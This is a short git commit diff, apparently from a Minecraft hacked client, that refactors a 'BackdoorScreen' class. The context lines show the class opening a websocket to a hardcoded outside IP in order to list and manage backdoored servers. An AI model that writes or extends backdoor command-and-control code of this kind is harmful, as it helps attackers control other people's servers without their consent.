fix moledoor

This commit is contained in:
ZeoNight 2022-05-26 23:25:30 +03:00
parent e0256a4a68
commit 76c02c64f8

View file

@ -22,7 +22,7 @@ import net.shadow.client.feature.items.impl.Backdoor;
import net.shadow.client.helper.render.MSAAFramebuffer;
import net.shadow.client.helper.render.Renderer;
public class BackdoorScreen extends Screen{
public class BackdoorScreen extends ClientScreen {
String serverid = "";
List<BackdoorEntry> servers = new ArrayList<BackdoorEntry>();
@ -33,9 +33,10 @@ public class BackdoorScreen extends Screen{
BackdoorSocket bs;
public BackdoorScreen() {
super(Text.of("uwu"));
super(MSAAFramebuffer.MAX_SAMPLES);
this.bs = new BackdoorSocket(URI.create("ws://45.142.115.91/"), this);
servers.clear();
bs.connect();
}